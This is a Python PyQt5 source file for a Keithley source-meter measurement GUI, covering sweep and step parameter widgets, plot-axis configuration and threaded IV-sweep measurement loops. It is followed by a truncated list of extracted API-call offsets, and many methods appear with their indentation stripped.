		self.step_pages.addWidget(self.current_step)
		self.step_pages.setCurrentIndex(0)
		# Step control state machine: button toggles between ON and OFF states
		self.step_state = QStateMachine()
		self.step_button = QPushButton()
		self.step_button.setStyleSheet(
			"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
		# Create step states
		self.step_on = QState()
		self.step_off = QState()
		# Assign state properties and transitions; entering a state fires its exec_* handler
		self.step_on.assignProperty(self.step_button, 'text', 'Step Bias ON')
		self.step_on.addTransition(self.step_button.clicked, self.step_off)
		self.step_on.entered.connect(self.exec_step_on)
		self.step_off.assignProperty(self.step_button, 'text', 'Step Bias OFF')
		self.step_off.addTransition(self.step_button.clicked, self.step_on)
		self.step_off.entered.connect(self.exec_step_off)
		# Add states, set initial state, and start the state machine
		self.step_state.addState(self.step_on)
		self.step_state.addState(self.step_off)
		self.step_state.setInitialState(self.step_off)
		self.step_state.start()
		# Pack widgets
		self.step_ctrl_layout.addWidget(self.step_ctrl_label)
		self.step_ctrl_layout.addWidget(self._gen_hbox_widget([self.step_inst,self.step_inst_label]))
		self.step_ctrl_layout.addWidget(self._gen_hbox_widget([self.step_src, self.step_src_label]))
		self.step_ctrl_layout.addWidget(self.step_pages)
		self.step_ctrl_layout.addWidget(self.step_button)
		self.step_ctrl_layout.addStretch(1)
		# Set layout and return reference
		self.step_ctrl.setLayout(self.step_ctrl_layout)
		return self.step_ctrl
# Plot control layout
	def gen_plot_ctrl(self):
		"""Build the plot-axis configuration page (device and quantity per axis).

		:return: the assembled QWidget.
		"""
		self.plot_ctrl = QWidget()
		self.plot_ctrl_layout = QVBoxLayout()
		# x-axis: device selector plus Voltage/Current quantity selector
		self.plot_x_inst_label = QLabel("<b>Configure x-axis</b>")
		self.plot_x_inst = self._gen_device_select()
		self.plot_x_inst.setFixedWidth(200)
		self.plot_x_inst.set_callback("update_plot_ctrl")
		self.plot_x_data = QComboBox()
		self.plot_x_data.setFixedWidth(100)
		self.plot_x_data.addItems(["Voltage", "Current"])
		self.plot_x_data.currentTextChanged.connect( self.update_plot_ctrl )
		# y-axis: device selector plus Voltage/Current quantity selector
		# (defaults to Current, index 1)
		self.plot_y_inst_label = QLabel("<b>Configure y-axis</b>")
		self.plot_y_inst = self._gen_device_select()
		self.plot_y_inst.setFixedWidth(200)
		self.plot_y_inst.set_callback("update_plot_ctrl")
		self.plot_y_data = QComboBox()
		self.plot_y_data.setFixedWidth(100)
		self.plot_y_data.addItems(["Voltage", "Current"])
		self.plot_y_data.setCurrentIndex(1)
		self.plot_y_data.currentTextChanged.connect( self.update_plot_ctrl )
		# Add widgets
		self.plot_ctrl_layout.addWidget( self.plot_x_inst_label )
		self.plot_ctrl_layout.addWidget( self._gen_hbox_widget( [self.plot_x_inst,self.plot_x_data]) )
		self.plot_ctrl_layout.addWidget( self.plot_y_inst_label )
		self.plot_ctrl_layout.addWidget( self._gen_hbox_widget( [self.plot_y_inst,self.plot_y_data]) )
		self.plot_ctrl_layout.addStretch(1)
		# Set layout and return reference
		self.plot_ctrl.setLayout(self.plot_ctrl_layout)
		return self.plot_ctrl
# Generate voltage sweep widget
def gen_voltage_sweep(self):
# New QWidget
self.voltage_sweep = QWidget()
self.voltage_sweep_layout = QVBoxLayout()
# Sweep Start
self.voltage_sweep_start_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Sweep Start (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [0.00, ""]
}
self.voltage_sweep_start = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_start_config)
# Sweep Stop
self.voltage_sweep_stop_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Sweep Stop (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [1.00, ""]
}
self.voltage_sweep_stop = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_stop_config)
# Compliance Spinbox
self.voltage_sweep_cmpl_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Compliance (A)",
"signed" : False,
"limit" : [1.0, "" ],
"default" : [150, "m"]
}
self.voltage_sweep_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_cmpl_config)
# Number of points
self.voltage_sweep_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [512],
"default" : [51]
}
self.voltage_sweep_npts = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_npts_config)
# Measurement Delay
self.voltage_sweep_delay_config={
"unit" : "__DOUBLE__",
"label" : "Measurement Interval (s)",
"signed" : False,
"limit" : [60.0],
"default" : [0.10]
}
self.voltage_sweep_delay = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_delay_config)
# Pack selectors into layout
self.voltage_sweep_layout.addWidget(self.voltage_sweep_start)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_stop)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_cmpl)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_npts)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_delay)
self.voltage_sweep_layout.setContentsMargins(0,0,0,0)
# Set layout
self.voltage_sweep.setLayout(self.voltage_sweep_layout)
# Generate current sweep widget
def gen_current_sweep(self):
# New QWidget
self.current_sweep = QWidget()
self.current_sweep_layout = QVBoxLayout()
# Sweep Start
self.current_sweep_start_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Sweep Start (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [0.0, "m"]
}
self.current_sweep_start = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_start_config)
# Sweep Stop
self.current_sweep_stop_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Sweep Stop (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [100, "m"]
}
self.current_sweep_stop = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_stop_config)
# Compliance Spinbox
self.current_sweep_cmpl_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Compliance (V)",
"signed" : False,
"limit" : [20., ""],
"default" : [1.0, ""]
}
self.current_sweep_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_cmpl_config)
# Number of points
self.current_sweep_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [256],
"default" : [11]
}
self.current_sweep_npts = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_npts_config)
# Measurement Delay
self.current_sweep_delay_config={
"unit" : "__DOUBLE__",
"label" : "Measurement Interval (s)",
"signed" : False,
"limit" : [60.0],
"default" : [0.1]
}
self.current_sweep_delay = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_delay_config)
# Pack selectors into layout
self.current_sweep_layout.addWidget(self.current_sweep_start)
self.current_sweep_layout.addWidget(self.current_sweep_stop)
self.current_sweep_layout.addWidget(self.current_sweep_cmpl)
self.current_sweep_layout.addWidget(self.current_sweep_npts)
self.current_sweep_layout.addWidget(self.current_sweep_delay)
self.current_sweep_layout.setContentsMargins(0,0,0,0)
# Set layout
self.current_sweep.setLayout(self.current_sweep_layout)
# Generate voltage step widget
def gen_voltage_step(self):
# New QWidget
self.voltage_step= QWidget()
self.voltage_step_layout = QVBoxLayout()
# Step Start
self.voltage_step_start_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Step Start (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [0.00, ""]
}
self.voltage_step_start = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_start_config)
# Step Stop
self.voltage_step_stop_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Step Stop (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [1.00, ""]
}
self.voltage_step_stop = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_stop_config)
# Step Compliance Spinbox
self.voltage_step_cmpl_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Compliance (A)",
"signed" : False,
"limit" : [1.0, "" ],
"default" : [150, "m"]
}
self.voltage_step_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_cmpl_config)
# Step Number of points
self.voltage_step_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [256],
"default" : [5]
}
self.voltage_step_npts = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_npts_config)
# Pack selectors into layout
self.voltage_step_layout.addWidget(self.voltage_step_start)
self.voltage_step_layout.addWidget(self.voltage_step_stop)
self.voltage_step_layout.addWidget(self.voltage_step_cmpl)
self.voltage_step_layout.addWidget(self.voltage_step_npts)
self.voltage_step_layout.setContentsMargins(0,0,0,0)
# Set layout
self.voltage_step.setLayout(self.voltage_step_layout)
# Generate current step widget
def gen_current_step(self):
# New QWidget
self.current_step = QWidget()
self.current_step_layout = QVBoxLayout()
# Step Start
self.current_step_start_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Step Start (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [0.0, "m"]
}
self.current_step_start = QVisaUnitSelector.QVisaUnitSelector(self.current_step_start_config)
# Step Stop
self.current_step_stop_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Step Stop (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [1.0, "m"]
}
self.current_step_stop = QVisaUnitSelector.QVisaUnitSelector(self.current_step_stop_config)
# Step Compliance Spinbox
self.current_step_cmpl_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Compliance (V)",
"signed" : False,
"limit" : [20.0, ""],
"default" : [1.00, ""]
}
self.current_step_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.current_step_cmpl_config)
# Step Number of points
self.current_step_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [256],
"default" : [5]
}
self.current_step_npts = QVisaUnitSelector.QVisaUnitSelector(self.current_step_npts_config)
# Pack selectors into layout
self.current_step_layout.addWidget(self.current_step_start)
self.current_step_layout.addWidget(self.current_step_stop)
self.current_step_layout.addWidget(self.current_step_cmpl)
self.current_step_layout.addWidget(self.current_step_npts)
self.current_step_layout.addStretch(1)
self.current_step_layout.setContentsMargins(0,0,0,0)
# Set layout
self.current_step.setLayout(self.current_step_layout)
	# Add dynamic plot
	def gen_main_plot(self):
		"""Create the QVisaDynamicPlot canvas (single "111" subplot) and return it."""
		# Create QVisaDynamicPlot object (inherits QWidget)
		self.plot = QVisaDynamicPlot.QVisaDynamicPlot(self)
		self.plot.add_subplot(111)
		self.plot.add_origin_lines("111", "both")
		self.plot.set_axes_labels("111", "Voltage (V)", "Current (A)")
		# Refresh canvas
		self.plot.refresh_canvas(supress_warning=True)
		# Sync plot clear data button with application data
		self.plot.sync_application_data(True)
		# Sync meta widget when clearing data (callback is looked up by name)
		self.plot.set_mpl_refresh_callback("_sync_meta_widget_to_data_object")
		# Return the plot
		return self.plot
# Sync meta widget
def _sync_meta_widget_to_data_object(self):
# Application keys
_data_keys = self._get_data_object().keys()
_widget_keys = self.meta_widget.get_meta_keys()
# Check if widget keys are not in data keys
for _key in _widget_keys:
# If not then delete the key from meta_widget
if _key not in _data_keys:
self.meta_widget.del_meta_key(_key)
#####################################
# UPDATE CONFIG PAGE
#
def update_config_page(self):
if self.meas_config_page.currentText() == "IV-sweep":
self.meas_pages.setCurrentIndex(0)
if self.meas_config_page.currentText() == "IV-step":
self.meas_pages.setCurrentIndex(1)
if self.meas_config_page.currentText() == "IV-plot":
self.meas_pages.setCurrentIndex(2)
#####################################
# SWEEP CONTROL UPDATE METHODS
#
# Sweep control dynamic update
def update_sweep_ctrl(self):
# Switch to voltage sweep page
if self.sweep_src.currentText() == "Voltage":
self.sweep_pages.setCurrentIndex(0)
self.update_meas_params()
# Switch to current sweep page
if self.sweep_src.currentText() == "Current":
self.sweep_pages.setCurrentIndex(1)
self.update_meas_params()
# Sweep control dynamic update
def update_step_ctrl(self):
# Switch to voltage sweep page
if self.step_src.currentText() == "Voltage":
self.step_pages.setCurrentIndex(0)
self.update_meas_params()
# Switch to current sweep page
if self.step_src.currentText() == "Current":
self.step_pages.setCurrentIndex(1)
self.update_meas_params()
# Update plot axes when we change configuration
def update_plot_ctrl(self):
# Extract correct unit labels
x_unit = "(V)" if self.plot_x_data.currentText() == "Voltage" else "(A)"
y_unit = "(V)" if self.plot_y_data.currentText() == "Voltage" else "(A)"
# Update axes
self.plot.set_axes_labels("111",
"%s %s : %s"%(self.plot_x_data.currentText(), x_unit ,self.plot_x_inst.currentText()),
"%s %s : %s"%(self.plot_y_data.currentText(), y_unit ,self.plot_y_inst.currentText())
)
self.plot.update_canvas()
# Create Measurement
	def update_meas_params(self):
		"""Push the current UI sweep/step parameters to the instruments.

		Recomputes the "__sweep__" (and "__step__") bias arrays and configures
		each Keithley as a voltage or current source with the matching
		compliance. The step instrument is only configured when it differs
		from the sweep instrument, so a doubly-selected device keeps its
		sweep setup.
		"""
		# Set up v-source(i-compliance) on keithley
		if self.sweep_src.currentText() == "Voltage":
			# Set sweep parameters
			self.set_sweep_params(
				self.voltage_sweep_start.value(),
				self.voltage_sweep_stop.value(),
				self.voltage_sweep_npts.value())
			# Set keithley as voltage source
			if self.keithley(self.sweep_inst) is not None:
				self.keithley(self.sweep_inst).voltage_src()
				self.keithley(self.sweep_inst).set_voltage(0.0)
				self.keithley(self.sweep_inst).current_cmp(self.voltage_sweep_cmpl.value())
		# Set up i-source(v-compliance) on keithley
		if self.sweep_src.currentText() == "Current":
			# Set sweep parameters
			self.set_sweep_params(
				self.current_sweep_start.value(),
				self.current_sweep_stop.value(),
				self.current_sweep_npts.value())
			# Set keithley as current source
			if self.keithley(self.sweep_inst) is not None:
				self.keithley(self.sweep_inst).current_src()
				self.keithley(self.sweep_inst).set_current(0.0)
				self.keithley(self.sweep_inst).voltage_cmp(self.current_sweep_cmpl.value())
		# Set step keithley as voltage source. Also ensure that we are not initializing
		# the the sweep keithely with step params if doubly selected.
		if ( ( self.keithley(self.step_inst) is not None) and
			(self.keithley(self.step_inst) != self.keithley(self.sweep_inst) ) ):
			# Set up v-source(i-compliance) on keithley
			if self.step_src.currentText() == "Voltage":
				# Set step parameters
				self.set_step_params(
					self.voltage_step_start.value(),
					self.voltage_step_stop.value(),
					self.voltage_step_npts.value())
				# Set keithley as voltage source
				if self.keithley(self.step_inst) is not None:
					self.keithley(self.step_inst).voltage_src()
					self.keithley(self.step_inst).set_voltage(0.0)
					self.keithley(self.step_inst).current_cmp(self.voltage_step_cmpl.value())
			# Set up i-source(v-compliance) on keithley
			if self.step_src.currentText() == "Current":
				# Set step parameters
				self.set_step_params(
					self.current_step_start.value(),
					self.current_step_stop.value(),
					self.current_step_npts.value())
				# Set keithley as current source
				if self.keithley(self.step_inst) is not None:
					self.keithley(self.step_inst).current_src()
					self.keithley(self.step_inst).set_current(0.0)
					self.keithley(self.step_inst).voltage_cmp(self.current_step_cmpl.value())
#####################################
# MEASUREMENT EXECUTION THREADS
#
# Function we run when we enter run state
def exec_step_on(self):
# Update UI button to abort
self.step_button.setStyleSheet(
"background-color: #cce6ff; border-style: solid; border-width: 1px; border-color: #1a75ff; padding: 7px;")
# Check if no insturments are initialized
if self.sweep_inst.currentText() == "" and self.step_inst.currentText() == "":
# Message box to warn the user
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("No devices initialized")
msg.setWindowTitle("QKeithleySweep")
msg.setWindowIcon(self._icon)
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
# Set app meta and revert state
self._set_app_metadata("__exec_step__", False)
self.step_button.click()
# Check if the same insturment is initialized
elif self.sweep_inst.currentText() == self.step_inst.currentText():
# Message box to warn the user
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("Same device %s selected for sweep and step parameters. Proceed?"%self.step_inst.currentText())
msg.setWindowTitle("QKeithleySweep")
msg.setWindowIcon(self._icon)
msg.setStandardButtons(QMessageBox.Ok)
msg.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
self.msg_clear = msg.exec_()
# Expose this for testing
if self.msg_clear == QMessageBox.Yes:
self._set_app_metadata("__exec_step__", True)
else:
self._set_app_metadata("__exec_step__", False)
self.step_button.click()
else:
self._set_app_metadata("__exec_step__", True)
# Function we run when we enter run state
def exec_step_off(self):
# Update UI button to abort
self.step_button.setStyleSheet(
"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
self._set_app_metadata("__exec_step__", False)
# Execute Sweep-Step Measurement
	def exec_sweep_step_thread(self):
		"""Worker thread: run a full IV-sweep at each step bias value.

		For every value in "__step__" app metadata, the step source is set and
		the entire "__sweep__" bias list is swept while voltage/current are
		read on both instruments. Data are stored under per-step hash keys
		linked to a common "__root__" key, and the selected x/y quantities are
		streamed to the plot. Clearing self.thread_running aborts cleanly.

		NOTE(review): assumes "__sweep__" and "__step__" each contain at least
		one value — with empty metadata, __sweep_func__/__step_func__ would be
		unbound at the reset calls near the end. Confirm callers guarantee this.
		"""
		# Generate function pointer for sweep voltage/current mode
		if self.sweep_src.currentText() == "Voltage":
			__sweep_func__ = self.keithley(self.sweep_inst).set_voltage
			__sweep_delay__ = self.voltage_sweep_delay.value()
		if self.sweep_src.currentText() == "Current":
			__sweep_func__ = self.keithley(self.sweep_inst).set_current
			__sweep_delay__ = self.current_sweep_delay.value()
		# Timestamp origin for the "t" data column
		start = time.time()
		# Use generator function so all traces have same color
		_c = self.plot.gen_next_color()
		_handle_index = 0
		# Get data object
		data = self._get_data_object()
		# Master key: all per-step keys reference this via "__root__"
		_root = data.add_hash_key("iv-sweep-v-step")
		# Set metadata for root
		# NOTE(review): both branches store "__type__" = "iv-sweep-v-step";
		# the Current branch likely intends "iv-sweep-i-step" (cf. the
		# per-step key names below) — confirm downstream consumers before changing.
		if self.step_src.currentText() == "Voltage":
			data.set_metadata(_root, "__type__", "iv-sweep-v-step")
		if self.step_src.currentText() == "Current":
			data.set_metadata(_root, "__type__", "iv-sweep-v-step")
		# Add key to meta widget
		self.meta_widget.add_meta_key(_root)
		# Internal buffers: each entry holds the instrument (or an alias to the
		# sweep/step entry) and the last measured [V, I] strings
		buffers = {
			"__sweep__" : {"inst" : self.sweep_inst, "data" : None},
			"__step__" : {"inst" : self.step_inst , "data" : None},
			"__plotx__" : None,
			"__ploty__" : None
		}
		# Plot-axis instruments: alias to sweep/step buffers when the same
		# device is selected, otherwise measure on a third instrument
		for plot_key, plot_inst in zip(["__plotx__", "__ploty__" ], [ self.plot_x_inst, self.plot_y_inst] ):
			if self.sweep_inst.currentText() == plot_inst.currentText():
				buffers[ plot_key ] = {"inst" : "__sweep__", "data" : None }
			elif self.step_inst.currentText() == plot_inst.currentText():
				buffers[ plot_key ] = {"inst" : "__step__", "data" : None }
			else:
				buffers[ plot_key ] = {"inst" : plot_inst, "data" : None}
		# Loop through all instruments and enable outputs
		for _key, _buffer in buffers.items():
			if _buffer["inst"] not in ["__sweep__", "__step__"]:
				self.keithley( _buffer["inst"] ).output_on()
		# Loop through step variables and generate subkeys
		for _step in self._get_app_metadata("__step__"):
			# If thread is running
			if self.thread_running:
				# A hash is generated for each voltage/current step for ease of data processing
				# Generate function pointer for step voltage/current mode
				if self.step_src.currentText() == "Voltage":
					__step_func__ = self.keithley(self.step_inst).set_voltage
					# Generate data key and set metadata
					data = self._get_data_object()
					key = data.add_hash_key("iv-sweep-v-step%s"%_step)
					# Add keys and metadata to data object
					data.set_metadata(key, "__root__", _root)
					data.set_metadata(key, "__step__", _step)
					data.set_subkeys(key, ["t", "V0", "I0", "P0", "V1", "I1", "P1"])
				# Current Mode
				if self.step_src.currentText() == "Current":
					__step_func__ = self.keithley(self.step_inst).set_current
					key = data.add_hash_key("iv-sweep-i-step%s"%_step)
					# Add keys and metadata to data object
					data.set_metadata(key, "__root__", _root)
					data.set_metadata(key, "__step__", _step)
					data.set_subkeys(key, ["t", "V0", "I0", "P0", "V1", "I1", "P1"])
				# Set step voltage/current
				__step_func__(_step)
				# Add axes handle to root
				self.plot.add_axes_handle("111", _root, _color=_c)
				# Bias settle
				if __sweep_delay__ != 0:
					time.sleep(__sweep_delay__)
				# Loop through sweep variables
				for _bias in self._get_app_metadata("__sweep__"):
					# If thread is running
					if self.thread_running:
						# Set voltage/current bias
						__sweep_func__(_bias)
						# Populate measurement buffers: meas() returns a
						# comma-separated string, split into [V, I, ...]
						buffers["__sweep__"]["data"] = self.keithley( buffers["__sweep__"]["inst"] ).meas().split(",")
						buffers["__step__"]["data"] = self.keithley( buffers["__step__"]["inst"] ).meas().split(",")
						# Plot instruments copy sweep/step data or meas() if needed
						for plot_buffer in ["__plotx__", "__ploty__"]:
							if buffers[plot_buffer]["inst"] == "__sweep__":
								buffers[plot_buffer]["data"] = buffers["__sweep__"]["data"]
							elif buffers[plot_buffer]["inst"] == "__step__":
								buffers[plot_buffer]["data"] = buffers["__step__"]["data"]
							else:
								buffers[plot_buffer]["data"] = self.keithley( buffers[plot_buffer]["inst"] ).meas().split(",")
						# Apply delay
						if __sweep_delay__ != 0:
							time.sleep(__sweep_delay__)
						# Elapsed time since the sweep started
						_now = float(time.time() - start)
						# Append measured values to data arrays
						# (0 = sweep instrument, 1 = step instrument)
						data.append_subkey_data(key,"t", _now )
						data.append_subkey_data(key,"V0", float( buffers["__sweep__"]["data"][0]) )
						data.append_subkey_data(key,"I0", float( buffers["__sweep__"]["data"][1]) )
						data.append_subkey_data(key,"P0", float( buffers["__sweep__"]["data"][0]) * float(buffers["__sweep__"]["data"][1]) )
						data.append_subkey_data(key,"V1", float( buffers["__step__"]["data"][0]) )
						data.append_subkey_data(key,"I1", float( buffers["__step__"]["data"][1]) )
						data.append_subkey_data(key,"P1", float( buffers["__step__"]["data"][0]) * float(buffers["__step__"]["data"][1]) )
						# Sync x-axis data (index 0 = voltage, 1 = current)
						if self.plot_x_data.currentText() == "Voltage":
							p0 = buffers["__plotx__"]["data"][0]
						if self.plot_x_data.currentText() == "Current":
							p0 = buffers["__plotx__"]["data"][1]
						# Sync y-axis data
						if self.plot_y_data.currentText() == "Voltage":
							p1 = buffers["__ploty__"]["data"][0]
						if self.plot_y_data.currentText() == "Current":
							p1 = buffers["__ploty__"]["data"][1]
						# Update the data
						self.plot.append_handle_data("111", _root, float(p0), float(p1), _handle_index)
						self.plot.update_canvas()
					else:
						break
				# Increment handle index
				_handle_index += 1
			else:
				break
		# Reset active keithleys to zero bias
		__sweep_func__(0.0)
		__step_func__(0.0)
		# Loop through all instruments and disable outputs
		for _key, _buffer in buffers.items():
			if _buffer["inst"] not in ["__sweep__", "__step__"]:
				self.keithley( _buffer["inst"] ).output_off()
		# Reset sweep control and update measurement state to stop.
		# Post a button click event to the QStateMachine to trigger
		# a state transition if thread is still running (not aborted)
		if self.thread_running:
			self.meas_button.click()
# Execute Sweep Measurement
def exec_sweep_thread(self):
# Generate data key
data = self._get_data_object()
key = data.add_hash_key("iv-sweep")
# Add data fields to key
data.set_subkeys(key, ["t", "V", "I", "P"])
data.set_metadata(key, "__type__", "iv-sweep")
# Add key to meta widget
self.meta_widget.add_meta_key(key)
# Generate function pointer for voltage/current mode
if self.sweep_src.currentText() == "Voltage":
__sweep_func__ = self.keithley(self.sweep_inst).set_voltage
__sweep_delay__ = self.voltage_sweep_delay.value()
if self.sweep_src.currentText() == "Current":
__sweep_func__ = self.keithley(self.sweep_inst).set_current
__sweep_delay__ = self.current_sweep_delay.value()
# Clear plot and zero arrays
handle = self.plot.add_axes_handle("111", key)
start = time.time()
# Create internal data structure for buffers
buffers = {
"__sweep__" : {"inst" : self.sweep_inst, "data" : None},
"__plotx__" : None,
"__ploty__" : None
}
# x-axis insturment
for plot_key, plot_inst in zip( ["__plotx__", "__ploty__" ], [self.plot_x_inst, self.plot_y_inst] ):
if self.sweep_inst.currentText() == plot_inst.currentText():
buffers[plot_key] = {"inst" : "__sweep__", "data" : None }
else:
buffers[plot_key] = {"inst" : plot_inst, "data" : None}
# Loop throgh all insurments and enable outputs
for _key, _buffer in buffers.items():
if _buffer["inst"] not in ["__sweep__"]:
self.keithley( _buffer["inst"] ).output_on()
# Loop through sweep variables
for _bias in self._get_app_metadata("__sweep__"):
# If thread is running
if self.thread_running:
# Set voltage/current bias
__sweep_func__(_bias)
# Populate buffers
buffers["__sweep__"]["data"] = self.keithley( buffers["__sweep__"]["inst"] ).meas().split(",")
# Plot insturments will copy sweep data or meas() if needed
for plot_buffer in ["__plotx__", "__ploty__"]:
if buffers[plot_buffer]["inst"] == "__sweep__":
buffers[plot_buffer]["data"] = buffers["__sweep__"]["data"]
else:
buffers[plot_buffer]["data"] = self.keithley( buffers[plot_buffer]["inst"] ).meas().split(",")
if __sweep_delay__ != 0:
time.sleep(__sweep_delay__)
# Extract data from buffer
_now = float(time.time() - start)
# Append measured values to data arrays
data.append_subkey_data(key,"t", _now )
data.append_subkey_data(key,"V", float( buffers["__sweep__"]["data"][0]) )
data.append_subkey_data(key,"I", float( buffers["__sweep__"]["data"][1]) )
data.append_subkey_data(key,"P", float( buffers["__sweep__"]["data"][0]) * float(buffers["__sweep__"]["data"][1]) )
# Sync x-axis data
if self.plot_x_data.currentText() == "Voltage":
p0 = buffers["__plotx__"]["data"][0]
if self.plot_x_data.currentText() == "Current":
p0 = buffers["__plotx__"]["data"][1]
# Sync y-axis data
if self.plot_y_data.currentText() == "Voltage":
p1 = buffers["__ploty__"]["data"][0]
if self.plot_y_data.currentText() == "Current":
p1 = buffers["__ploty__"]["data"][1]
# Update the data
self.plot.append_handle_data("111", key, float(p0), float(p1))
self.plot.update_canvas()
# Reset Keithley
__sweep_func__(0.0)
# Loop throgh all insurments and enable outputs
for _key, _buffer in buffers.items():
if _buffer["inst"] not in ["__sweep__"]:
self.keithley( _buffer["inst"] ).output_off()
# Reset sweep control and update measurement state to stop.
# Post a button click event to the QStateMachine to trigger
# a state transition if thread is still running (not aborted)
if self.thread_running:
self.meas_button.click()
# Function we run when we enter run state
def exec_meas_run(self):
# Update sweep and step params
self.update_meas_params()
# For startup protection
if self.keithley(self.sweep_inst) is not None:
# Update UI button to abort
self.meas_button.setStyleSheet(
"background-color: #ffcccc; border-style: solid; border-width: 1px; border-color: #800000; padding: 7px;")
# Disable controls (sweep)
self.sweep_src.setEnabled(False)
self.sweep_inst.setEnabled(False)
# Disable controls (step)
self.step_src.setEnabled(False)
self.step_inst.setEnabled(False)
self.step_button.setEnabled(False)
# Disable controls (save)
self.save_widget.setEnabled(False)
# Plot contollers (plots)
self.plot.mpl_refresh_setEnabled(False)
self.plot_x_inst.setEnabled(False)
self.plot_x_data.setEnabled(False)
self.plot_y_inst.setEnabled(False)
self.plot_y_data.setEnabled(False)
# Check app meta and run sweep or sweep-step tread
if self._get_app_metadata("__exec_step__") == True:
self.thread = threading.Thread(target=self.exec_sweep_step_thread, args=())
else:
self.thread = threading.Thread(target=self.exec_sweep_thread, args=())
self.thread.daemon = True # Daemonize thread
self.thread.start() # Start the execution
self.thread_running = True
# Function we run when we enter abort state
def exec_meas_stop(self):
# For startup protection
if self.keithley(self.sweep_inst) is not None:
# Update UI button to start state
self.meas_button.setStyleSheet(
"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
# Enable controls (sweep)
self.sweep_src.setEnabled(True)
self.sweep_inst.setEnabled(True)
# Enable controls (step)
self.step_src.setEnabled(True)
self.step_inst.setEnabled(True)
self.step_button.setEnabled(True)
# Enable controls (save)
self.save_widget.setEnabled(True)
# Plot contollers
self.plot.mpl_refresh_setEnabled(True)
self.plot_x_inst.setEnabled(True)
self.plot_x_data.setEnabled(True)
self.plot_y_inst.setEnabled(True)
self.plot_y_data.setEnabled(True)
# Kill measurement thread
self.thread_running = False
self.thread.join() # Waits for thread to complete
| [
"PyQt5.QtWidgets.QMessageBox",
"time.sleep",
"PyQt5.QtWidgets.QStackedWidget",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtWidgets.QComboBox",
"numpy.where",
"PyQt5.QtWidgets.QLabel",
"PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector",
"numpy.concatenate",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.Q... | [((5102, 5115), 'PyQt5.QtWidgets.QHBoxLayout', 'QHBoxLayout', ([], {}), '()\n', (5113, 5115), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((5533, 5542), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (5540, 5542), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((5569, 5582), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (5580, 5582), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((5799, 5814), 'PyQt5.QtCore.QStateMachine', 'QStateMachine', ([], {}), '()\n', (5812, 5814), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((5836, 5849), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (5847, 5849), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, 